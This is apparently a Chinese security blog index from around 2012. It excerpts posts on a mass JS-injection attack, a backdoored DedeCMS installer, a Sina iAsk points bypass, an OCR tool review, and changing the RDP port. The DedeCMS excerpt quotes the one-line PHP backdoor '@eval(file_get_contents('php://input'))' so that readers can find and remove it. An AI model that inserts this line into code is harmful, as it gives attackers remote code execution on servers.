Web应用漏洞的大规模攻击案例分析

文章来源:知道创宇

当一个流行的Web应用漏洞碰到充满想象力的Web Hackers,会产生什么化学效应?

By GreySign@Yunnan:2012/3/20

我们常常听闻各种Web漏洞被发现、被利用、被大肆宣传,或许安全厂商们都多多少少有点让用户们觉得这只是恐吓营销的手段,

但我们从不这么认为。

从我们的团队创立至今,分析、深入追踪过的案例大大小小已经数不清,但我们也相信,这些被发现的精彩的大规模攻击、APT攻击(当最初我们看到各种高级攻击的时候,还不知道如何称呼它们)只是冰山一角,浮出水面的每个事件,在经过各位安全研究员的深入分析,都足以拍成一部电影。

Anonymous对全球白帽子下了3月31日瘫痪DNS根服务器的挑战书的时候,我相信在这个互联网上大隐于市的高手们经已蓄势待发,默默捍卫承载着无数梦想的国度。与此同时,我们也在贡献着力所能及的微薄力量,时刻响应来自客户、来自国家、来自互联网那些需要我们帮助的安全事件。

在最近一段时间,我们发现了一个大规模攻击,与各位共享一下这个有意思的追踪过程。

 一段神秘的JS

最初的时候,我们发现客户的网站的js里都嵌入了一段加密后的脚本,虽然加密、压缩、代码混淆也时常是JS开发者压缩代码、保护代码的手段,

不过仔细看看解密后的代码,往往会有一些精彩的故事在里面。

用浏览器或其他工具看客户网站上的脚本(如:http://a.com/wp-includes/js/jquery/jquery.js?ver=1.6.1),在文件底部发现:

 

此时,我顺便看了看其他存放在本站的脚本文件,也全部被感染,插入了一样的脚本,

看上去这像是自动化的批量插入的代码,我对它进行了解密: 继续阅读

织梦官网安装包再次被植入一句话木马

织梦内容管理系统一直以方便快捷强大而著称,但是这次..就连官网也受到影响…

最新消息,其实我是在微博上看到有人发布了这个消息。

织梦V5.7SP1版本安装包内被人植入了一句话木马。

我自己亲自去测试了一下,果真,被人植入了一句话木马。

所幸的事,我管理的两个网站并没有被植入(是因为之前早些日子被下载的原因吧!)

木马位置在uploads->include->shopcar.class.php文件中的第32行。

连官网都被日了- -最近下载了织梦并且传上服务器的朋友,要小心了。。

修复方案:删除@eval(file_get_contents(‘php://input’)),以及针对服务器进行全面的扫描杀毒。

新浪爱问共享资料下载积分绕过

其实这个是很早就发现有的一个bug。

可能很多人都知道,也有人说,这个没什么大碍,发布了也没意义。

在我看来不是这样的,既然他本身要积分,那么就是对共享资料者的一种知识产权的尊重。

如是说来,还是要针对这个漏洞进行上报。

目前已经提交给@乌云处理。

细节请关注:http://www.wooyun.org/bugs/wooyun-2010-05369

汉王PDF_ocr-一款转换PDF、图片为文档、记事本的小软件

前言:某天,小编在百度文库上发现了一个不错的PDF文档,想把他转成txt记事本,但是无奈。。多次尝试没有成功。

于是在伟大的度娘的帮助下,找到了汉王。

简单先介绍先这款软件:



汉王 PDF OCR 提供 PDF 自动转换 RTF/TXT 功能,同时支持JPEG/GIF 等图像格式文本识别,识别正确率还是挺高的,虽然没有100%.但是70%、80%还是有的。

优点:对纯中文/英文的情况处理准确率极高,支持打印功能,高效率的将图片转为文字(在图片不复杂的情况下)。

缺点:但对同一行中英文混合的情况处理不理想,对复杂图片处理有待提高。

附:

1、安装好了之后,打开都会提示是否更新。这里建议不更新,因为目前的功能已经够用-__-!!再更新可是要收费的了。

2、软件虽然是免费的,但是请勿用于商业用途。

 

 

修改3389端口的方法一则

针对目前频发的安全事故,以及最近经常流行ms12-020漏洞以及其修改版。

结合这个漏洞,有某位师兄给了我一些防范的建议。

第一是对服务器更新开启自动更新。

第二是对3389远程登录端口的修改,这里我在网上找了一个方法,目前我修改已经成功,拿出来和大家分享。

总共有两个步骤:一是修改服务器端的端口设置;二是客户端连接方法。方法如下(以Windows Server 2003为例,其它系统仅供参考):

一、修改服务器端的端口设置(注册表有2处需要修改) 继续阅读